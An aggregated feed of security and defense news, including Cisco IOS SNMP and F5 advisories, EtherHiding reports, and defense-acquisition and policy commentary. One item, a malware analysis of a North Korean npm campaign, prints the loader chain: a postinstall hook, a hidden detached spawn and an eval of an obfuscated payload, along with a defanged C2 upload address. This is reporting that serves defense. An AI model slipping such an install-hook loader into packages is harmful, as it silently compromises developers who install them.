• VMware has launched the latest versions of its desktop hypervisors, Workstation 25H2 and Fusion 25H2, bringing significant improvements to virtualization technology. These updates introduce a simplified versioning system, powerful new features, and expanded compatibility with modern operating systems and hardware. VMware has abandoned traditional version numbering like Workstation 17.6.x and Fusion 13.6.x in favor of […]

    The post VMware Releases Workstation & Fusion 25H2 With Enhanced Features and OS Support appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Microsoft on Thursday disclosed that it revoked more than 200 certificates used by a threat actor it tracks as Vanilla Tempest to fraudulently sign malicious binaries in ransomware attacks. The certificates were “used in fake Teams setup files to deliver the Oyster backdoor and ultimately deploy Rhysida ransomware,” the Microsoft Threat Intelligence team said in a post shared on X. The tech

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Cisco has disclosed a serious security vulnerability affecting its IOS and IOS XE Software that could allow attackers to execute remote code or crash affected devices. The flaw, tracked as CVE-2025-20352, resides in the Simple Network Management Protocol (SNMP) subsystem and carries a CVSS score of 7.7, marking it as a high-severity threat. Overview of […]

    The post Critical Cisco IOS and IOS XE Flaws Allow Remote Code Execution appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • F5 Networks has released comprehensive security patches addressing multiple critical vulnerabilities across its product portfolio following a recent security incident. The company issued its quarterly security notification on October 15, 2025, documenting numerous high-severity vulnerabilities that could potentially expose enterprise networks to significant security risks. Extensive Vulnerability Disclosure Reveals Multiple Attack Vectors The security advisory […]

    The post F5 Issues Security Patches for Multiple Products After Recent Breach appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The cybersecurity landscape has witnessed a significant evolution in attack techniques with North Korean threat actors adopting EtherHiding, a sophisticated method that leverages blockchain technology to distribute malware and facilitate cryptocurrency theft. EtherHiding represents a fundamental shift in how cybercriminals store and deliver malicious payloads by embedding malware code within smart contracts on public blockchains […]

    The post North Korean Hackers Exploit EtherHiding to Spread Malware and Steal Crypto Assets appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Cisco has disclosed a severe vulnerability in its widely used IOS and IOS XE Software, potentially allowing attackers to crash devices or seize full control through remote code execution.

    The flaw, rooted in the Simple Network Management Protocol (SNMP) subsystem, stems from a stack overflow condition that attackers can trigger with a specially crafted SNMP packet over IPv4 or IPv6 networks.

    This issue affects all SNMP versions and has already seen exploitation in the wild, highlighting the urgency for network administrators to act swiftly.

    The vulnerability enables two main attack vectors. A low-privileged, authenticated remote attacker armed with SNMPv2c read-only community strings or valid SNMPv3 credentials could induce a denial-of-service (DoS) condition, forcing affected devices to reload and disrupting network operations.

    More alarmingly, a highly privileged attacker with administrative or privilege level 15 access could execute arbitrary code as the root user on IOS XE devices, granting complete system takeover.

    Cisco’s Product Security Incident Response Team (PSIRT) discovered this during a Technical Assistance Center support case, and real-world exploits followed compromised local administrator credentials.

    This flaw impacts a broad range of Cisco devices running vulnerable IOS or IOS XE releases with SNMP enabled, including routers, switches, and access points essential to enterprise infrastructures.

    Devices that haven’t explicitly excluded the affected object ID (OID) remain at risk. Notably, IOS XR Software and NX-OS Software are unaffected, providing some relief for users of those platforms.

    The potential fallout is significant: DoS attacks could halt critical services, while root-level code execution might enable data theft, lateral movement in networks, or deployment of malware.

    Given SNMP’s ubiquity for device monitoring, many organizations unwittingly expose themselves by leaving default configurations intact.

    Mitigations

    Cisco emphasizes that no full workarounds exist, but mitigations can curb immediate threats. Administrators should restrict SNMP access to trusted users only and monitor via the “show snmp host” CLI command.

    A key step involves disabling vulnerable OIDs using the “snmp-server view” command to create a restricted view, then applying it to community strings or SNMPv3 groups. For Meraki cloud-managed switches, contacting support is advised to implement these changes.

    Patches are now available through Cisco’s September 2025 Semiannual Security Advisory Bundled Publication. Users can verify exposure and find fixed releases using the Cisco Software Checker tool.

    To check SNMP status, run CLI commands like “show running-config | include snmp-server community” for v1/v2c or “show snmp user” for v3.

    Cisco urges immediate upgrades to fortified software, warning that delays could invite further exploits. As networks grow more interconnected, such vulnerabilities underscore the need for rigorous SNMP hardening and proactive patching.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post Cisco IOS and IOS XE Software Vulnerabilities Let Attackers Execute Remote Code appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Warriors need critical skills that make them “competent, qualified, agile, professional, aggressive, innovative, risk-taking, apolitical,” Secretary Hegseth told senior officers last month. He could just as well have been talking about the department’s civilian acquisition workforce, who are vital to efforts to achieve strategic advantage over our adversaries.

    Developing these skills must start long before a new employee arrives at DOD. That’s why we created the Defense Civilian Training Corps, a scholarship-for-service program that helps undergraduate students learn the skills that will help them succeed as acquisition professionals. The Pentagon launched DCTC in 2023 to prototype a college-campus talent-development model; it currently operates at University of Arizona, North Carolina A&T State University, Purdue University, and Virginia Tech; and it will expand to six universities for the cohort graduating in 2027.

    While the program’s future is uncertain, what is certain is the critical need for a civilian workforce that embodies these skills. And for leaders to invest in their development.

    Our competitive edge in warfighting is the culture of mission command, which empowers disciplined initiative, rooted in trust and shared understanding within a commander’s intent. The defense acquisition business ensures warfighters have the capabilities they need when they need them. There, our competitive edge is the acquisition workforce’s understanding of best practices, and the ability and willingness to think critically to solve complex problems at speed.

    Day in and day out, acquisition professionals are required to make tough judgment calls; consider competing approaches; balance risk, cost, capability, and schedule; and develop strategies. Every one of these decisions is directly related to speeding capabilities to the warfighter, making warrior ethos as critical in the civilian workforce as on the battlefield.

    Every acquisition-policy reform effort in recent memory (and there have been dozens) has heralded our people as our greatest asset to achieving that reform. But each time, DoD has relied upon training—mostly on-the-job training—to equip the workforce with tools for change. We’ve failed to recognize that it’s not people who are our greatest asset, but how we empower those people.

    The way forward

    Our leaders need an acquisition workforce with a mindset that recognizes the inherent value of data, uses digital tools for rapid iteration, and collaborates across disciplines to find creative solutions to our hardest problems. The place to gain first exposure and practice these critical thinking skills is the university setting, where multidisciplinary teams can tackle real-life problems using principles from systems engineering, lean startup methodology, and design thinking.

    DCTC has done the work of researching the critical skills that DOD organizations need most and prototyping a program to develop them. It combines project-based learning in the classroom with hands-on summer internships that embed scholars in DOD teams. It is the education needed to position the civilian workforce to learn, unlearn, and relearn at the pace of today’s rapid cycles of technological evolution and policy reform—that is, to keep the defense acquisition business’ competitive edge.

    DCTC is a blueprint for a talent factory; now we must scale that factory. Fortunately, the cost is low, and dropping: the first cohort of 80 DCTC scholars graduated in May at a cost to the taxpayer of about $120,000 per student. As we prepare to expand to new campuses, we have already reduced the per-student cost, and are working to cut by more than 50%.

    The need for a new approach to training is urgent, and not just because of developments abroad. Today, the FAR is being overhauled and JCIDS dismantled as part of a generational effort to fundamentally change our culture from one that measures success by procedural compliance, to one that values risk-taking and creativity to achieve speed, flexibility, and lethality. But experience shows the culture will resist these changes—unless we also reform how we develop our workforce talent. We cannot rely on the training that got us here. As the Air Force’s acting acquisition executive, William Bailey, noted at the NDIA-ETI Emerging Technologies for Defense conference, progress will be made not through policy, but by people around a table.

    A civilian workforce educated and empowered to think critically and communicate effectively is the missing link to a warrior-ethos culture that will ensure our strategic competitive edge. Expanding investment in DCTC is crucial to ensuring that the civilian acquisition workforce can adapt to the challenges of today and tomorrow.

    Karen Thornton is a Fellow at the Acquisition Innovation Research Center, a member of the adjunct faculty at the George Washington University Law School, and a Director on the Procurement Round Table.

    John Willison is a Fellow at the Acquisition Innovation Research Center, as well as founder and president of J Willison Consulting, LLC, and a certified Executive Coach.

    The views presented are their own and do not necessarily represent the views of the Department of Defense (War).

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A new information-stealer has emerged targeting job seekers with a trojanized Node.js application named Chessfi.

    Delivered via a modified npm package hosted on the official repository, the malware blends two previously separate tools—BeaverTail and OtterCookie—into a unified JavaScript payload.

    Victims are lured through fake employment offers and asked to install the application under the guise of a coding assessment, unknowingly triggering malicious scripts that harvest credentials, cryptocurrency wallets and user activity.

    Cisco Talos analysts identified the campaign when investigating unusual outbound traffic from a compromised system.

    They found that a post‐installation script in the node-nvm-ssh package spawns a hidden child process that deobfuscates and evaluates a large JavaScript payload.

    Node-nvm-ssh infection path (Source – Cisco Talos)

    This payload merges BeaverTail’s browser extension enumeration and InvisibleFerret Python downloader with OtterCookie’s remote shell, file exfiltration, clipboard and now keylogging modules.

    Once executed, the combined malware establishes a connection to a command-and-control server over socket.io.

    The attacker can remotely issue commands, steal files matching a wide range of patterns—from .env and .docx to cryptocurrency extension directories—and execute shell commands.

    Meanwhile, the keylogging component captures every keystroke and takes periodic desktop screenshots before uploading them to the C2 server along with clipboard contents.

    Sustained network activity

    Infected systems show sustained network activity on high-numbered TCP ports, often 1418 for socket.io and 1478 for keylog uploads.

    The malware creates a temporary folder named windows-cache and writes keystrokes to 1.tmp every second, while screenshots are saved as 2.jpeg every four seconds.

    Using the Node.js packages node-global-key-listener, screenshot-desktop and sharp, the module configures listeners for key events and schedules screenshot captures, then bundles and sends the data to hxxp://172.86.88.188:1478/upload.

    The keylogger listens for the keyboard and mouse key presses and saves them into a file (Source – Cisco Talos)

    In addition to credential theft and remote shell access, the campaign’s infection mechanism employs a multi-stage chain to evade detection. After cloning the repository, a malicious postinstall script in package.json executes the skip script:

    "scripts": {
      "postinstall": "npm run test npm run transpile npm run skip"
    }

    The skip command invokes node testfixtures/eval, which by default loads index.js. That script spawns a detached child process running file15.js:

    const filePath = path.join(__dirname, 'node_modules', 'file15.js');
    const child = spawn(process.execPath, [filePath], { detached: true, stdio: 'ignore' });

    Finally, file15.js reads and evaluates the content of test.list using eval, revealing the combined BeaverTail and OtterCookie modules:

    const fs = require('fs');
    const path = require('path');
    const filePath = path.join(__dirname, 'test.list');
    fs.readFile(filePath, 'utf8', (err, data) => { eval(data); });

    This convoluted chain—cloning a Git repository, running benign-looking npm scripts, spawning hidden processes and dynamically evaluating an obfuscated payload—underscores the sophisticated infection mechanism.

    By merging BeaverTail’s stealthy Python payload downloader and OtterCookie’s modular information-stealer, Famous Chollima has crafted a versatile malware that leverages familiar developer workflows to compromise unsuspecting victims.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post North Korean Hackers Using Malicious Scripts Combining BeaverTail and OtterCookie for Keylogging appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Air Force cancels plans to create a command focused on competing with China. Defense One’s Thomas Novelly: “Ending the creation of a permanent Integrated Capabilities Command—a major command slated to be led by a three-star general focused on modernizing and prioritizing the service’s future acquisitions—reverses a key initiative by former Air Force Secretary Frank Kendall.” 

    A provisional ICC was established in November to help lift acquisition responsibility from major commands to help them focus on other priorities. But the effort was paused by Defense Secretary Pete Hegseth in February. On Wednesday, service officials said the ICC’s responsibilities will by April 1 be folded into the existing Air Force Futures organization. Known as A5/7, it will gain a “Chief Modernization Officer” focused on strategy and force design, mission integration, capability development, and modernizing the service’s platforms. 

    Defense budget experts weren’t surprised by the decision to end the ICC, saying it followed a trend of the Air Force casting aside parts of the Biden-era reorganization plan. “This is really a course correction on the whole reorganization that Frank Kendall put in place,” said Todd Harrison, a senior fellow at the American Enterprise Institute. Novelly has more, here.

    The Army’s new tank will roll out a decade early, its manufacturer said Wednesday. Last year, service acquisition leaders shifted course when they awarded the contract for the M1E3 tank. “Rather than pick out every single communications system and sensor that would go into the next Abrams for the rest of its service life, the Army is opting for an open system that will allow new software to be plugged in as needed,” Defense One’s Meghann Myers reported off comments by Danny Deep, General Dynamics’ executive vice president for global operations. That means soldiers are expected to be riding in the M1E3 next year, well ahead of the tank's planned 2030s arrival. Read on, here.

    Additional reading: 


    Welcome to this Thursday edition of The D Brief, a newsletter dedicated to developments affecting the future of U.S. national security, brought to you by Ben Watson and Bradley Peniston. It’s more important than ever to stay informed, so thank you for reading. Share your tips and feedback here. And if you’re not already subscribed, you can do that here. On this day in 1962, the Cuban missile crisis began. 

    Trump 2.0

    Developing: President Trump now seems to want to go to war to implement regime change in Venezuela. U.S. officials told the New York Times that the White House “has secretly authorized the C.I.A. to conduct covert action in Venezuela…stepping up a campaign against Nicolás Maduro, the country’s authoritarian leader.” 

    “We are certainly looking at [airstrikes on Venezuelan] land now, because we’ve got the sea very well under control,” Trump told reporters after confirming the Times reporting Wednesday. 

    To be clear, “The Trump administration’s strategy on Venezuela, developed by Secretary of State Marco Rubio, with help from John Ratcliffe, the C.I.A. director, aims to oust Mr. Maduro from power,” U.S. officials told the Times.

    By the way: American B-52 bombers were spotted in the air near Venezuela on Wednesday, according to public flight-tracking sites, the UK Defence Journal reported. On the one hand, “The flight profile is somewhat consistent with long-range training and deterrence patrols routinely conducted by B-52s from Barksdale Air Force Base across the Caribbean.” However, “The flight path brought the bombers close to La Orchila and Gran Roque, both Venezuelan islands with military facilities,” which along with their “visibility on open tracking platforms suggested a deliberate signalling exercise.”Trump also said he’s ordered the military to attack those small boats without due process—killing more than two dozen people in at least six watercraft to date—because prior U.S. Coast Guard interdictions of alleged drug traffickers “never worked when you did it in a very politically correct manner.”  

    Reminder: Neither the White House nor the Defense Department has yet offered proof that any of the six boats it has destroyed were in fact trafficking drugs, insisting instead that unreleased “intelligence” confirms their allegations.  

    Sen. Jeanne Shaheen, D-N.H., ranking member of the Foreign Relations Committee: “I support cracking down on the cartels and traffickers. But the Trump Administration’s authorization of covert C.I.A. action, conducting lethal strikes on boats and hinting at land operations in Venezuela slides the United States closer to outright conflict with no transparency, oversight or apparent guardrails. The American people deserve to know if the Administration is leading the U.S. into another conflict, putting servicemembers at risk or pursuing a regime-change operation.” 

    For what it’s worth, Trump promised during last year’s presidential campaign that he was “not going to start a war.” He also promised to end Russia’s Ukraine invasion in a single day, to end inflation, and lower grocery prices for Americans. But nine months into his second term, none of those three promises have materialized. He and Republicans in Washington have, however, initiated what Trump promises will be the largest mass deportation operation in history, and those operations—as predicted here, here, here, and here, e.g.—have worsened the economic outlook for everyday Americans and slowed the global economy, according to the International Monetary Fund’s latest forecast

    As Ukraine’s president heads to the White House Friday, Spain is facing a new threat from its chief NATO ally in Washington. “Spain was the only member of the 32-nation alliance not to commit to increasing military spending to 5% of GDP,” Reuters reported Tuesday. The western European nation is currently spending 1.3% on defense, with a promise to raise that number to 2% by the end of the year. 

    “I'm not happy with Spain…I was thinking of giving them trade punishment through tariffs because of what they did, and I think I may do that,” Trump suggested to reporters on Tuesday. Another possible response from Trump “would be moving the naval and air bases the US has in southern Spain to Morocco—an idea floated by former Trump official Robert Greenway—which would damage the local economies through the loss of thousands of indirect jobs,” al-Jazeera reports

    Madrid’s reax: “We are committed to the defense, to the security of NATO and, at the same time, we are equally committed to the defense of our welfare state,” Prime Minister Pedro Sánchez said after Trump’s tariff threat. 

    Semi-related new polling: “Far more Americans think the United States should mainly make important foreign policy decisions with major allies (60%) versus on its own (21%),” the Chicago Council announced in a new report published Tuesday. 

    Also notable: “The highest levels of Americans yet recorded in Chicago Council polling think US security alliances in Europe (68%), Asia (72%), and the Middle East (67%) benefit the United States alone or the United States along with its regional allies,” the Council’s pollsters write. Read more, here.

    Additional reading:

    At the Pentagon

    Most of the reporters who cover the Pentagon turned in their access badges on Wednesday afternoon rather than agree to new reporting rules. Associated Press: “News outlets were nearly unanimous in rejecting new rules imposed by Defense Secretary Pete Hegseth that would leave journalists vulnerable to expulsion if they sought to report on information—classified or otherwise—that had not been approved by Hegseth for release.” Hegseth has called the new rules “common sense” to help regulate what Trump has called a “very disruptive” press. More, here. (Defense One reporters were among those who declined to sign the Pentagon’s new agreement; the publication co-signed a statement with several other defense-oriented newsrooms, here.)

    • Read the Pentagon’s agreement, annotated by the New York Times, here.

    “[M]ake no mistake, today, Oct. 15, 2025 is a dark day for press freedom that raises concerns about a weakening U.S. commitment to transparency in governance, to public accountability at the Pentagon and to free speech for all,” the Pentagon Press Association said in a statement Wednesday. Trump’s Defense Department “did this because reporters would not sign onto a new media policy over its implicit threat of criminalizing national security reporting and exposing those who sign it to potential prosecution.” Nevertheless, the group added, “The Pentagon Press Association's members are still committed to reporting on the U.S. military.” 

    Sen. Tammy Duckworth, Army veteran and Democrat from Illinois: “The American people deserve transparency from their government—especially from an Administration that brags about being ‘the most transparent Administration in history’ and from a department with a nearly $1 trillion budget funded by taxpayer dollars.” 

    “You don’t hide and avoid accountability when you’re proud of what you’re doing,” Duckworth said. “You hide when you know what you’re doing is wrong. These sort of un-American restrictions on the free press could be expected from an authoritarian regime, but Pete Hegseth should know they simply have no place—and are not necessary—from the United States government.”

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A threat actor with ties to the Democratic People’s Republic of Korea (aka North Korea) has been observed leveraging the EtherHiding technique to distribute malware and enable cryptocurrency theft, marking the first time a state-sponsored hacking group has embraced the method. The activity has been attributed by Google Threat Intelligence Group (GTIG) to a threat cluster it tracks as UNC5342,

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶